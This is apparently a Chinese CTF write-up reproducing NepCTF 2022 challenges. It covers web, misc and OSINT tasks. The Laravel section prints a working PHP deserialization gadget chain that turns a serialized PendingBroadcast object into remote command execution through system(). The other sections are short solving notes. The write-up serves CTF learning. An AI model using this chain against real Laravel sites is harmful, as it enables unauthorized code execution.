[NepCTF2022] 复现

Just Kidding

顽皮的HRP用Laravel写了个项目来欢迎大伙来玩Nepctf 2nd，没想到…居然被坏蛋Sharun撅了

www.zip源码泄露  ，啥也不懂没注意正确的入口在哪里，一直把注意力放在web.php上面 

没有注意到这里use导入类的路径，跟着路径找到反序列化入口

 

当时写的过程，确实9.12.2的版本也是用网上流传的9.1.8的链子可以打，

当时就是没找到正确的入口和路径 

 

https://github.com/1nhann/vulns/issues

pop1,直接rce  

namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}
 
namespace Illuminate\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = "system";
 
        }
    }
}
 
namespace Illuminate\Broadcasting{
 
    use Illuminate\Contracts\Queue\ShouldQueue;
 
    class BroadcastEvent implements ShouldQueue {
        function __construct()
        {
 
        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "ls /";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}
namespace{
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}

 注意payload路径 ，上传后 访问源码可以看到成功rce的回显

 

Challenger

顽皮的HRP又换了种语言写项目来欢迎大家，没想到又让Sharun掘了

java的框架，给了jar， 反编译

目前没学过java，所以跟着wp走一遍，也是网上的链子打

 Java安全之Thymeleaf 模板注入分析 - nice_0e3 - 博客园

 

 

 

 

签到题

binwalk分离图片

得到压缩包套娃

import zipfile
 
a=""
for i in range(232,2,-1):
  a=str(i)+".zip"
  print(a)
  with zipfile.ZipFile(a) as zf:
    zf.extractall()

芃哥给的脚本解压，解压到最后

 

本来找密码爆破，其实是伪加密

看文件名也知道是键盘流量了

王一航Usb脚本梭

少见的base 

附件就一个jpg试了一下没出来啥信息就放下了，没想到是真签到

JPHS这工具很少用就忘了， 无密码直接seek 就出来了

 base58 

 

花花画画画花花 

附件下载后 是个osz后缀, 当时用010看是压缩包文件头，就改后缀了。。。。

 要正确打开osz文件 

 osu打开，这个是个音乐游戏吧，

 

 

馅饼？陷阱！

右下角有个车牌琼，写的时候都没发现，尚德源茶 定位到三亚 发现正好是这里

左上角就是银行